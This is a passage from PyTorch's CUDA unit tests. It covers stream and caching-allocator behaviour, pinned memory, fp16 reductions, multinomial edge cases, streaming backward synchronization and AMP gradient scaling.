with torch.cuda.stream(stream):
tmp = t.cuda(non_blocking=True)
ptr[0] = tmp.data_ptr()
torch.cuda.current_stream().wait_stream(stream)
tmp.record_stream(torch.cuda.current_stream())
torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy
result.copy_(tmp)
perform_copy()
with torch.cuda.stream(stream):
tmp2 = torch.cuda.FloatTensor(t.size())
tmp2.zero_()
self.assertNotEqual(tmp2.data_ptr(), ptr[0], msg='allocation re-used to soon')
self.assertEqual(result.tolist(), [1, 2, 3, 4])
# Check that the block will be re-used after the main stream finishes
torch.cuda.current_stream().synchronize()
with torch.cuda.stream(stream):
tmp3 = torch.cuda.FloatTensor(t.size())
self.assertEqual(tmp3.data_ptr(), ptr[0], msg='allocation not re-used')
def test_record_stream_on_shifted_view(self):
# See issue #27366
# This test detects unexpected block reallocation. For reliable test,
# the stream to allocate tensors is isolated. The allocator will not
# reuse free blocks which were allocated from another stream.
stream_alloc = torch.cuda.Stream()
with torch.cuda.stream(stream_alloc):
base = torch.cuda.FloatTensor([10, 10])
# Record another stream on a shifted view tensor.
view = base[5:]
assert view.storage_offset() > 0
stream_record = torch.cuda.Stream()
with torch.cuda.stream(stream_record):
torch.cuda._sleep(int(50 * get_cycles_per_ms()))
view.record_stream(stream_record)
# Delete those tensors to make the block free soon.
data_ptr = base.data_ptr()
del base, view
# A new tensor should not be allocated to the block above.
stream_alloc.synchronize()
with torch.cuda.stream(stream_alloc):
try_realloc = torch.cuda.FloatTensor([10, 10])
self.assertNotEqual(try_realloc.data_ptr(), data_ptr)
@contextlib.contextmanager
def _get_external_stream(self, device):
cudart = torch.cuda.cudart()
stream = ctypes.c_ulonglong(0)
stream_p = ctypes.POINTER(ctypes.c_void_p)(stream)
stream_p_int = ctypes.cast(stream_p, ctypes.c_void_p).value
with device:
try:
out = cudart.cudaStreamCreate(stream_p_int)
self.assertEqual(out, 0)
self.assertNotEqual(stream.value, 0)
yield stream.value
finally:
out = cudart.cudaStreamDestroy(stream.value)
self.assertEqual(out, 0)
@skipIfRocm
def test_external_streams(self):
device = torch.cuda.device(0)
with self._get_external_stream(device) as stream_v:
ext_stream = torch.cuda.streams.ExternalStream(stream_v)
self.assertEqual(stream_v, ext_stream.cuda_stream)
self.assertEqual(ext_stream.device.index, device.idx)
@skipIfRocm
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_external_streams_multi_device(self):
device = torch.cuda.device(1)
with self._get_external_stream(device) as stream_v:
ext_stream = torch.cuda.streams.ExternalStream(
stream_v, device=device)
self.assertEqual(stream_v, ext_stream.cuda_stream)
self.assertEqual(ext_stream.device.index, device.idx)
def test_noncontiguous_pinned_memory(self):
# See issue #3266
x = torch.arange(0, 10).view((2, 5))
self.assertEqual(x.t(), x.t().pin_memory())
def test_caching_pinned_memory(self):
cycles_per_ms = get_cycles_per_ms()
# check that allocations are re-used after deletion
t = torch.FloatTensor([1]).pin_memory()
ptr = t.data_ptr()
del t
t = torch.FloatTensor([1]).pin_memory()
self.assertEqual(t.data_ptr(), ptr, msg='allocation not reused')
# check that the allocation is not re-used if it's in-use by a copy
gpu_tensor = torch.cuda.FloatTensor([0])
torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy
gpu_tensor.copy_(t, non_blocking=True)
del t
t = torch.FloatTensor([1]).pin_memory()
self.assertNotEqual(t.data_ptr(), ptr, msg='allocation re-used too soon')
self.assertEqual(list(gpu_tensor), [1])
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_caching_pinned_memory_multi_gpu(self):
# checks that the events preventing pinned memory from being re-used
# too early are recorded on the correct GPU
cycles_per_ms = get_cycles_per_ms()
t = torch.FloatTensor([1]).pin_memory()
ptr = t.data_ptr()
gpu_tensor0 = torch.cuda.FloatTensor([0], device=0)
gpu_tensor1 = torch.cuda.FloatTensor([0], device=1)
with torch.cuda.device(1):
torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy
gpu_tensor1.copy_(t, non_blocking=True)
del t
t = torch.FloatTensor([2]).pin_memory()
self.assertNotEqual(t.data_ptr(), ptr, msg='allocation re-used too soon')
with torch.cuda.device(0):
gpu_tensor0.copy_(t, non_blocking=True)
self.assertEqual(gpu_tensor1[0], 1)
self.assertEqual(gpu_tensor0[0], 2)
def test_caching_allocator_record_stream_oom(self):
"""allocations delayed by a record_stream call should still be freed on
an out-of-memory in cuda_malloc_retry. see issue #19219"""
stream = torch.cuda.Stream()
with torch.cuda.stream(stream):
y = torch.zeros(40 * 1024 * 1024, device='cuda')
for _ in range(100):
x = torch.empty(40 * 1024 * 1024, device='cuda')
with torch.cuda.stream(stream):
y += x
# delays re-use of `x` until after all operations in `stream`
x.record_stream(stream)
del x
# we've made a mess by allocating up to the device capacity. free any
# cached blocks in case it affects future tests.
torch.cuda.empty_cache()
# Tests for historic illegal memory access, see #17040.
def test_reduction_gpu_memory_accessing(self):
x = torch.ones(512, 8, dtype=torch.float32, device='cuda')
torch.sum(x, 0)
def test_sum_fp16(self):
x = torch.zeros(10, device='cuda', dtype=torch.float16)
self.assertEqual(x.sum(), 0)
x = torch.ones(65504, device='cuda', dtype=torch.float16)
self.assertEqual(x.sum(), 65504)
self.assertEqual(x.sum(dtype=torch.float32), 65504)
x = torch.ones(65536, device='cuda', dtype=torch.float16)
self.assertEqual(x.sum(dtype=torch.float32), 65536)
a = torch.zeros(1203611).bernoulli_(0.0005)
x = a.to(device='cuda', dtype=torch.float16)
self.assertEqual(x.sum().item(), a.sum().item())
a = torch.zeros(100, 121, 80).bernoulli_(0.0005)
x = a.to(device='cuda', dtype=torch.float16)
self.assertEqual(x.sum((0, 2)).float().cpu(), a.sum((0, 2)))
def test_mean_fp16(self):
x = torch.ones(65536, device='cuda', dtype=torch.float16)
self.assertEqual(x.mean(), 1)
x = torch.ones(65536, device='cuda', dtype=torch.float16)
self.assertEqual(x.mean(dtype=torch.float32), 1)
def test_prod_large(self):
# tests global reduction (should_global_reduce = true) in case of non-zero identity element
x = torch.ones(240000, device='cuda', dtype=torch.float32)
self.assertEqual(x.prod(), 1)
# test for complex types. Note 240k is divisible by 4
for dtype in [torch.cfloat, torch.cdouble]:
x = torch.ones(240000, device='cuda', dtype=dtype) * (0 + 1j)
self.assertEqual(x.prod(), 1)
def test_multinomial_ext(self):
# Test two corner cases from older PyTorch (Issue #4858)
freqs = torch.cuda.FloatTensor([
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.03178183361887932, 0.027680952101945877, 0.033176131546497345,
0.046052902936935425, 0.07742464542388916, 0.11543981730937958,
0.14148041605949402, 0.15784293413162231, 0.13180233538150787,
0.08271478116512299, 0.049702685326337814, 0.027557924389839172,
0.018125897273421288, 0.011851548217236996, 0.010252203792333603,
0.007422595750540495, 0.005372154992073774, 0.0045109698548913,
0.0036087757907807827, 0.0035267581697553396, 0.0018864056328311563,
0.0024605290964245796, 0.0022964938543736935, 0.0018453967059031129,
0.0010662291897460818, 0.0009842115687206388, 0.00045109697384759784,
0.0007791675161570311, 0.00020504408166743815, 0.00020504408166743815,
0.00020504408166743815, 0.00012302644609007984, 0.0,
0.00012302644609007984, 4.100881778867915e-05, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0])
torch.cuda.manual_seed(11042)
sample = torch.multinomial(freqs, 1000, True)
self.assertNotEqual(freqs[sample].min(), 0)
p = torch.zeros(3421, 2, device="cuda", dtype=torch.float)
p[:, 1] = 1
torch.cuda.manual_seed(5214)
r = torch.multinomial(p, 1)
self.assertNotEqual(r.min().item(), 0)
# test corner case from Issue #13867
torch.cuda.manual_seed(33)
probs = torch.randn(1000000, device='cuda').clamp(min=0) * 3e-5
samples = probs.multinomial(1000000, replacement=True)
self.assertGreater(probs[samples].min().item(), 0)
def _spawn_test_multinomial_invalid_probs_cuda(self, probs):
import subprocess
try:
p = subprocess.Popen([sys.executable, '-c', f"""\
import sys
import torch
from torch._six import inf, nan
try:
with torch.random.fork_rng(devices=[0]):
torch.multinomial(torch.tensor({probs}).to('cuda'), 2, replacement=True)
torch.cuda.synchronize()
sys.exit(-1) # Should not be reached
except RuntimeError as e:
sys.exit(-2)
"""], stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
out, err = p.communicate(timeout=10)
p.wait(timeout=10)
except subprocess.TimeoutExpired as e:
p.kill()
out, err = p.communicate()
expected_messages = [
'device-side assert triggered', # CUDA
'Assertion', # CUDA
'HSA_STATUS_ERROR_EXCEPTION', # ROCm
'Device-side assertion' # ROCm
]
self.assertTrue(any([msg in out or msg in err for msg in expected_messages]))
@slowTest
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
def test_multinomial_invalid_probs_cuda(self):
self._spawn_test_multinomial_invalid_probs_cuda([1., -1., 1.])
self._spawn_test_multinomial_invalid_probs_cuda([1., inf, 1.])
self._spawn_test_multinomial_invalid_probs_cuda([1., -inf, 1.])
self._spawn_test_multinomial_invalid_probs_cuda([1., 1., nan])
@slowTest
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_huge_index(self):
src = torch.empty(15000000, 45, device='cuda', dtype=torch.long).random_(0, 2**22)
idx = torch.randperm(src.shape[0], device='cuda')
res = src[idx]
res_cpu = src.cpu()[idx.cpu()]
self.assertEqual(res.cpu(), res_cpu)
def test_tensor_gather(self):
AbstractTestCases._TestTorchMixin._test_gather(self, lambda t: t.cuda(), False)
def test_tensor_scatter(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(), 'scatter_', test_bounds=False)
def test_tensor_scatterAdd(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(), 'scatter_add_', test_bounds=False)
def test_scatter_add_mult_index_base(self):
AbstractTestCases._TestTorchMixin._test_scatter_add_mult_index_base(self, lambda t: t.cuda())
def test_tensor_scatterFill(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_', True, test_bounds=False)
def test_tensor_scatter_complex(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_', test_bounds=False, test_complex=True)
def test_tensor_scatterAdd_complex(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_add_', test_bounds=False, test_complex=True)
def test_tensor_scatterFill_complex(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_', True, test_bounds=False, test_complex=True)
def test_min_max_inits(self):
# Testing if THC_reduceAll received the correct index initialization.
# This affects the result of THC_reduceAll operations at extreme values
x = torch.cuda.ByteTensor([0])
y = torch.cuda.ByteTensor([255])
expected = torch.cuda.LongTensor([0])[0]
_, v = x.max(dim=0)
self.assertEqual(v, expected)
_, v = y.min(dim=0)
self.assertEqual(v, expected)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_get_set_rng_state_all(self):
states = torch.cuda.get_rng_state_all()
before0 = torch.cuda.FloatTensor(100, device=0).normal_()
before1 = torch.cuda.FloatTensor(100, device=1).normal_()
torch.cuda.set_rng_state_all(states)
after0 = torch.cuda.FloatTensor(100, device=0).normal_()
after1 = torch.cuda.FloatTensor(100, device=1).normal_()
self.assertEqual(before0, after0, atol=0, rtol=0)
self.assertEqual(before1, after1, atol=0, rtol=0)
def test_nvtx(self):
# Just making sure we can see the symbols
torch.cuda.nvtx.range_push("foo")
torch.cuda.nvtx.mark("bar")
torch.cuda.nvtx.range_pop()
def test_bincount_ext(self):
# ensure CUDA code coverage
input_size = (5000,)
w = torch.randn(input_size, dtype=torch.double, device='cuda')
w_cpu = w.cpu()
# test shared memory impl
t = torch.randint(50, input_size, dtype=torch.int8, device='cuda')
self.assertEqual(t.cpu().bincount(), t.bincount())
self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))
# test multi block memory impl
# see `THRESH_NUMBER_BINS_FOR_MULTI_BLOCK_MEM` in SummaryOps.cu
t = torch.randint(500, input_size, dtype=torch.int64, device='cuda')
self.assertEqual(t.cpu().bincount(), t.bincount())
self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))
# test global memory impl
# see `THRESH_NUMBER_BINS_FOR_GLOBAL_MEM` in SummaryOps.cu
t = torch.randint(2000, input_size, dtype=torch.int64, device='cuda')
self.assertEqual(t.cpu().bincount(), t.bincount())
self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))
t = torch.zeros([10], dtype=torch.int32, device='cuda')
# 35488 * 65536 as int32 would cause overflow to negative value
# giving negative bin offset
t[0] = 35488
counted = t.bincount(minlength=65536)
self.assertEqual(torch.sum(counted), 10)
def test_tiny_half_norm_(self):
a = torch.arange(25).cuda().float()
a /= 100000000
b = a.half()
self.assertGreater(b.norm().item(), 0)
def test_norm_type_conversion(self):
a = torch.ones(65536).cuda().half()
self.assertEqual(a.norm(p=0, dtype=torch.float32), 65536)
# Test that wrap_with_cuda_memory_check successfully detects leak
def test_cuda_memory_leak_detection(self):
l = []
@self.wrap_with_cuda_memory_check
def no_leak():
pass
@self.wrap_with_cuda_memory_check
def leak_gpu0():
l.append(torch.tensor(10, device=torch.device("cuda:0")))
no_leak()
with self.assertRaisesRegex(AssertionError, r"leaked \d+ bytes CUDA memory on device 0"):
leak_gpu0()
if TEST_MULTIGPU:
@self.wrap_with_cuda_memory_check
def leak_gpu1():
l.append(torch.tensor(10, device=torch.device("cuda:1")))
with self.assertRaisesRegex(AssertionError, r"leaked \d+ bytes CUDA memory on device 1"):
leak_gpu1()
def test_cuda_memory_leak_detection_propagates_errors(self):
with self.assertRaisesRegex(RuntimeError, r"The size of tensor a \(3\) must match"):
with self.assertLeaksNoCudaTensors():
x = torch.randn(3, 1, device='cuda')
y = torch.randn(2, 1, device='cuda')
z = x + y
def test_trilu_indices(self):
for test_args in tri_tests_args:
_compare_trilu_indices(self, *test_args, device='cuda')
# test default options
x = torch.ones(
3, 3, dtype=torch.long, device='cuda', layout=torch.strided)
self.assertEqual(
x.tril(0).nonzero().transpose(0, 1),
torch.tril_indices(3, 3, device='cuda'))
self.assertEqual(
x.triu(0).nonzero().transpose(0, 1),
torch.triu_indices(3, 3, device='cuda'))
def test_large_trilu_indices(self):
for test_args in tri_large_tests_args:
_compare_large_trilu_indices(self, *test_args, device='cuda')
@unittest.skipIf(not TEST_MEDIUM_TENSOR, "not enough memory")
def test_cuda_kernel_loop_overflow(self):
# Issue #24309: In extreme cases, the loop variable could overflow and continue
# the kernel loop with a negative index, causing a RuntimeError (invalid write):
x = torch.randn(1, 1, 1, 2**30 + 1, dtype=torch.float16, device="cuda")
expected = x[0, 0, 0, 2**30]
y = torch.nn.functional.avg_pool2d(x, kernel_size=1)
torch.cuda.synchronize()
self.assertEqual(y[0, 0, 0, 2**30], expected)
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_cuda_kernel_loop_overflow_large(self):
# Make sure input.numel() > INT_MAX is handled:
x = torch.randn(1, 1, 1, 2**31, dtype=torch.float16, device="cuda")
with self.assertRaisesRegex(RuntimeError, "integer out of range"):
y = torch.nn.functional.avg_pool2d(x, kernel_size=1)
# Issue #24309: In extreme cases, the loop variable could overflow and continue
# the kernel loop with a negative index, causing a RuntimeError (invalid write):
x = torch.randn(1, 1, 1, 2**31 - 1, dtype=torch.float16, device="cuda")
expected = x[0, 0, 0, 2**31 - 2]
y = torch.nn.functional.avg_pool2d(x, kernel_size=1)
torch.cuda.synchronize()
self.assertEqual(y[0, 0, 0, 2**31 - 2], expected)
# this might create a reference cycle on self...
def _make_multiply_in_stream(self):
class MultiplyInStream(torch.autograd.Function):
@staticmethod
def forward(ctx, x, val):
ctx.val = val
ctx.stream = torch.cuda.current_stream()
return x * val
@staticmethod
def backward(ctx, grad):
self.assertEqual(torch.cuda.current_stream(), ctx.stream)
# delays the operation in the the background stream
torch.cuda._sleep(1000 * 5000)
return grad * ctx.val, None
return MultiplyInStream
@skipCUDANonDefaultStreamIf(True)
def test_streaming_backwards_sync(self):
default_stream = torch.cuda.current_stream()
stream = torch.cuda.Stream()
MultiplyInStream = self._make_multiply_in_stream()
# Tests using grads outside the backward() stream context
# See "Stream semantics of backward passes" on https://pytorch.org/docs/stable/notes/cuda.html
x = torch.randn(5, 5, device='cuda', requires_grad=True)
with torch.cuda.stream(stream):
stream.wait_stream(default_stream)
output = MultiplyInStream.apply(x, 2)
output.sum().backward()
# sync needed
default_stream.wait_stream(stream)
self.assertEqual(x.grad, torch.ones_like(x) * 2)
self.assertEqual(torch.cuda.current_stream(), default_stream)
# Tests that using grads in the same stream context as backward()
# is safe regardless what streams bwd ops ran on
bwd_ambient_stream = torch.cuda.Stream()
x = torch.randn(5, 5, device='cuda', requires_grad=True)
with torch.cuda.stream(stream):
stream.wait_stream(default_stream)
output = MultiplyInStream.apply(x, 3)
with torch.cuda.stream(bwd_ambient_stream):
bwd_ambient_stream.wait_stream(stream)
output.sum().backward()
# x was first used on "stream" so its AccumulateGrad leaf should run on "stream".
# The end of backward() should have synced "bwd_ambient_stream" with "stream"
# so it should be safe to use x.grad here without any syncs.
self.assertEqual(x.grad, torch.ones_like(x) * 3)
self.assertEqual(torch.cuda.current_stream(), bwd_ambient_stream)
# Skip the test for ROCm as per https://github.com/pytorch/pytorch/issues/53190
@skipIfRocm
def test_streaming_backwards_multiple_streams(self):
MultiplyInStream = self._make_multiply_in_stream()
class StreamModel(torch.nn.Module):
def __init__(self):
super(StreamModel, self).__init__()
self.event = torch.cuda.Event()
self.stream0 = torch.cuda.Stream()
self.stream1 = torch.cuda.Stream()
def forward(self, x, x_first_use_on_ambient):
if x_first_use_on_ambient:
x0 = x.clone()
self.stream0.wait_stream(torch.cuda.current_stream())
self.stream1.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(self.stream0):
if not x_first_use_on_ambient:
x0 = x.clone()
y0 = MultiplyInStream.apply(x0, 2)
self.event.record(stream=torch.cuda.current_stream())
with torch.cuda.stream(self.stream1):
y1 = MultiplyInStream.apply(x, 3)
self.stream1.wait_event(self.event)
return y0 + y1
stream = torch.cuda.Stream()
for x_first_use_on_ambient in (True, False):
# the out_of_place=False, iters=1 case stresses if proper syncs are inserted
# when grads are initially None and stolen by backward ops.
for out_of_place, iters in ((True, 1),
(False, 1),
(False, 5)):
with torch.cuda.stream(stream):
x = torch.randn(5, 5, device='cuda', requires_grad=True)
model = StreamModel().cuda()
x.register_hook(lambda grad: self.assertEqual(torch.cuda.current_stream(),
stream if x_first_use_on_ambient else model.stream0))
for p in model.parameters():
self.assertTrue(p.grad is None)
for i in range(iters):
loss = model(x, x_first_use_on_ambient).sum()
if out_of_place:
x_grad = torch.autograd.grad((loss,), (x,))[0]
else:
loss.backward()
# See "Stream semantics of backward passes" on https://pytorch.org/docs/stable/notes/cuda.html
torch.cuda.current_stream().wait_stream(stream)
if out_of_place:
self.assertEqual(x_grad, torch.ones_like(x) * 5 * iters)
else:
self.assertEqual(x.grad, torch.ones_like(x) * 5 * iters)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_streaming_backwards_device_transfer(self):
# This function must run with non-default current streams on all devices, otherwise it's meaningless.
# The intention is to test that to()'s backward (CopyBackward) interacts properly with the
# synchronization logic in torch/csrc/autograd/input_buffer.cpp.
dev0 = torch.device("cuda:0")
dev1 = torch.device("cuda:1")
# Unfortunately I need to make the tensors largeish.
# Bigger tensors = longer D2D transfers = more likely to expose races.
size = 2**26
a = torch.full((size,), 1, device=dev1, dtype=torch.float64, requires_grad=True)
b = torch.full((size,), 1, device=dev1, dtype=torch.float64, requires_grad=True)
# Here to_backward_recipient = a*b is used only once, so MulBackward's InputBuffer slot only expects 1 input.
# This tests the situation where we don't call InputBuffer::accumulate for MulBackward's InputBuffer.
to_backward_recipient = a * b
s = to_backward_recipient.to(device="cuda:0").sum()
torch.cuda.synchronize(device=dev0)
torch.cuda.synchronize(device=dev1)
s.backward()
self.assertTrue(a.grad.sum().item() == size)
self.assertTrue(b.grad.sum().item() == size)
# Here to_backward_recipient = a*b is used twice, so MulBackward's InputBuffer slot expects 2 inputs.
# This tests the situation where we do call InputBuffer::accumulate for MulBackward's InputBuffer.
a.grad = None
b.grad = None
to_backward_recipient = a * b
# Multiply by 2 here so to's backward creates gradient values that are different from the case above,
# to mitigate weirdness if the caching allocator happens to reuse memory regions that were populated
# with 1s by the case above
s0 = to_backward_recipient.to(device="cuda:0").sum() * 2.
s1 = to_backward_recipient.to(device="cuda:0").sum() * 2.
torch.cuda.synchronize(device=dev0)
torch.cuda.synchronize(device=dev1)
s0.backward(retain_graph=True)
s1.backward()
self.assertTrue(a.grad.sum().item() == 4 * size)
self.assertTrue(b.grad.sum().item() == 4 * size)
def test_streaming_backwards_sync_graph_root(self):
# This function tests if bwd ops running on a side stream properly sync with the GraphRoot.
# The potential bug it targets is a race condition. The test uses multiple trials and
# torch.cuda._sleep such that if the race condition exists, the test will almost certainly fail,
# but there's a chance it may spuriously pass. Passing does not guarantee the backend is bug-free,
# but failure does guarantee there is a bug.
fwd_bwd_op_stream = torch.cuda.Stream()
bwd_ambient_stream = torch.cuda.Stream()
# We need these streams to be different otherwise the test is meaningless.
self.assertTrue(fwd_bwd_op_stream != bwd_ambient_stream)
size = int(1e3)
a = torch.full((size,), 2.0, device="cuda", requires_grad=True)
b = torch.full((size,), 3.0, device="cuda", requires_grad=True)
# I don't think we need any manual record_streams below.
# a and b remain in scope for the entire test.
# c and grad remain in scope for each iteration, and there's a full sync between iterations.
for trial in range(5):
torch.cuda.synchronize()
a.grad = b.grad = None
with torch.cuda.stream(fwd_bwd_op_stream):
c = a * b
with torch.cuda.stream(bwd_ambient_stream):
torch.cuda.synchronize()
# Long-running dummy kernel on bwd_ambient_stream delays filling of grad
torch.cuda._sleep(int(50 * get_cycles_per_ms()))
# Fills grad on bwd_ambient_stream
grad = torch.full((size,), float(trial + 1), device="cuda")
# Bwd ops still run on fwd_bwd_ops_stream, so the following will likely fail if
# bwd ops don't sync with bwd_ambient_stream before consuming grad.
torch.autograd.backward(tensors=c, grad_tensors=grad)
# See https://github.com/pytorch/pytorch/issues/47028
# assertEquals below run on bwd_ambient_stream, so this test may also fail
# if backward() fails to sync with bwd_ambient_stream at the end.
# Synchronizing here works around the issue until a proper fix can be made.
torch.cuda.synchronize()
with torch.no_grad():
self.assertEqual(a.grad, grad * b)
self.assertEqual(b.grad, grad * a)
def test_streaming_backwards_callback(self):
# Tests if autograd callbacks sync properly with respect to leaf streams and
# the user-facing stream surrounding backward(). If it fails, first suspect is
# sync logic where "final_callbacks_" are called in torch/csrc/autograd/engine.cpp
MultiplyInStream = self._make_multiply_in_stream()
size = int(1e3)
a = torch.full((size,), 1, device="cuda", dtype=torch.float, requires_grad=True)
b = torch.full((size,), 1, device="cuda", dtype=torch.float, requires_grad=True)
s0 = torch.cuda.Stream()
s1 = torch.cuda.Stream()
s2 = torch.cuda.Stream()
stash = []
# sets up a nontrivial structure of leaf streams
s0.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s0):
c = MultiplyInStream.apply(a, 2)
s1.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s1):
d = MultiplyInStream.apply(b, 3)
s1.wait_stream(s0)
e = c * d
def clone_leaf_grads():
stash.append(a.grad.clone())
stash.append(b.grad.clone())
# Use a hook on e to install the callback
e.register_hook(lambda grad: torch.autograd.Variable._execution_engine.queue_callback(clone_leaf_grads))
s2.wait_stream(s1)
with torch.cuda.stream(s2):
e.sum().backward()
# The autograd engine should sync s2 with all leaf streams then run the callback clone_leaf_grads on s2.
# If those things happened properly, checking the values of the cloned grads on s2 should be safe:
self.assertEqual(stash[0], torch.full_like(a, 6))
self.assertEqual(stash[1], torch.full_like(a, 6))
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
@unittest.skipIf(IS_SANDCASTLE or IS_REMOTE_GPU, "Does not work on Sandcastle")
def test_cuda_init_race(self):
# See https://github.com/pytorch/pytorch/issues/16559
import subprocess
subprocess.check_call([sys.executable, '-c', """\
import torch
import threading
def worker(rank):
torch.tensor([1.]).cuda(rank)
t1 = threading.Thread(target=worker, args=(0,))
t2 = threading.Thread(target=worker, args=(1,))
t1.start()
t2.start()
"""])
def test_fixed_cuda_assert_async(self):
with self.assertRaisesRegex(RuntimeError, "Boolean value of Tensor with no values is ambiguous"):
torch._assert_async(torch.tensor([], device="cuda"))
with self.assertRaisesRegex(RuntimeError, "Boolean value of Tensor with more than one value is ambiguous"):
torch._assert_async(torch.tensor([0, 0], device="cuda"))
torch._assert_async(torch.tensor(1, device="cuda"))
torch._assert_async(torch.tensor(0.1, device="cuda"))
torch._assert_async(torch.tensor(-0.1, device="cuda"))
torch._assert_async(torch.tensor(True, device="cuda"))
torch._assert_async(torch.tensor(0 + 0.1j, device="cuda"))
fail_stmts = [
"torch._assert_async(torch.tensor(0, device='cuda'))",
"torch._assert_async(torch.tensor(0.0, device='cuda'))",
"torch._assert_async(torch.tensor(False, device='cuda'))",
"torch._assert_async(torch.tensor(0 + 0j, device='cuda'))",
]
import subprocess
for stmt in fail_stmts:
with self.subTest(stmt=stmt):
r = subprocess.call([sys.executable, '-c', f"""\
import torch
{stmt}
torch.cuda.synchronize()
"""])
self.assertTrue(r != 0)
def test_grad_scaling_unscale(self, dtype=torch.float):
inv_scale = torch.full((1,), 0.25, dtype=torch.float, device="cuda:0")
found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0")
size = 10
g = torch.full((size, size), 4.0, dtype=dtype, device="cuda:0")
ginf = g.clone()
ginf[2, 2] = float('inf')
gnan = g.clone()
gnan[2, 2] = float('nan')
# Tries selected combinations of
# - contiguous grads
# - g.clone().t() which is not contiguous but still non overlapping and dense
# - variants of g.clone()[:, :5] which are not non overlapping and dense
# Non overlapping and dense grads route into a multi tensor apply kernel,
# others use a fallback per-tensor kernel, so we should try both.
cases = (
([g.clone(), g.clone()], False),
([g.clone(), g.clone().t()], False),
([g.clone(), g.clone()[:, :5]], False),
([g.clone()[:, :5], g.clone()[:, :5]], False),
([g.clone(), ginf.clone()], True),
([g.clone(), gnan.clone()], True),
([g.clone(), ginf.clone()[:, :5]], True),
([g.clone(), gnan.clone()[:, :5]], True),
([ginf.clone(), g.clone()[:, :5]], True),
([ginf.clone()[:, :5], g.clone()[:, :5]], True),
)
for grads, has_inf in cases:
found_inf.zero_()
torch._amp_foreach_non_finite_check_and_unscale_(grads, found_inf, inv_scale)
if has_inf:
self.assertEqual(found_inf, 1.0)
else:
self.assertEqual(found_inf, 0.0)
for grad in grads:
self.assertTrue(torch.allclose(grad, torch.ones_like(grad), atol=1e-7))
# When passing lists with mismatched dtypes to a raw
# _amp_foreach_non_finite_check_and_unscale_ call,
# it's expected to fall back to single-tensor TensorIterator kernel.
grads = [g.clone(), g.to(dtype=torch.float16)]
torch._amp_foreach_non_finite_check_and_unscale_(grads, found_inf, inv_scale)
for grad in grads:
self.assertTrue(torch.allclose(grad, torch.ones_like(grad), atol=1e-7))
# Passing lists with mismatched devices to a raw
# _amp_foreach_non_finite_check_and_unscale_ call should raise errors.
if TEST_MULTIGPU:
with self.assertRaisesRegex(RuntimeError, r"Expected all tensors to be on the same device"):
torch._amp_foreach_non_finite_check_and_unscale_([g.clone(), g.to(device="cuda:1")],
found_inf,
inv_scale)
# Creates a list of grads with mismatched dtypes and devices, to ensure
# scaler._unscale_grads_ organizes grads by dtype and device before calling
# _amp_foreach_non_finite_check_and_unscale_ on each set.
# If inject_inf >= 0, writes an inf into one grad for _unscale_grads_ to find.
def perfect_storm_grads(inject_inf):
grads = [g.clone(), g.clone()[:, :5], g.to(dtype=torch.float16), g.to(dtype=torch.float16)]
if TEST_MULTIGPU:
grads += [g.to(device="cuda:1"),
g.to(device="cuda:1")[:, :5],
g.to(device="cuda:1", dtype=torch.float16),
g.to(device="cuda:1", dtype=torch.float16)]
if inject_inf >= 0:
grads[inject_inf][2, 2] = float('inf')
return grads
scaler = torch.cuda.amp.GradScaler()
dummy_params = [torch.empty_like(g) for g in perfect_storm_grads(-1)]
dummy_opt = torch.optim.SGD(dummy_params, lr=1.)
# Ensures the inf/nan checking can find an inf injected onto any grad in the perfect storm.
for inject_inf in range(-1, len(dummy_params)):
found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0")
grads = perfect_storm_grads(inject_inf)
for i, p in enumerate(dummy_params):
p.grad = grads[i]
found_inf_per_device = scaler._unscale_grads_(dummy_opt, inv_scale, found_inf, True)
if inject_inf < 0:
# No inf was injected, ensures unscaling worked normally.
self.assertTrue(sum(v.item() for v in found_inf_per_device.values()) == 0)
for grad in grads:
self.assertTrue(torch.allclose(grad, torch.ones_like(grad), atol=1e-7))
else:
# inf was injected, ensures inf was found.
self.assertTrue(sum(v.item() for v in found_inf_per_device.values()) == 1)
def test_grad_scaling_update_scale(self, device="cuda", dtype=torch.float):
growth = 2.0
backoff = 0.25
growth_interval = 2
scale = torch.full((1,), 4.0, dtype=dtype, device=device)
growth_tracker = torch.full((1,), 0.0, dtype=torch.int32, device=device)
found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0")
# Simulates 2 consecutive unskipped iterations
torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
self.assertEqual(growth_tracker, 1)
self.assertEqual(scale, 4.0)
torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
self.assertEqual(growth_tracker, 0)
self.assertEqual(scale, 8.0)
# Simulates a skipped iteration
found_inf.fill_(1.0)
torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
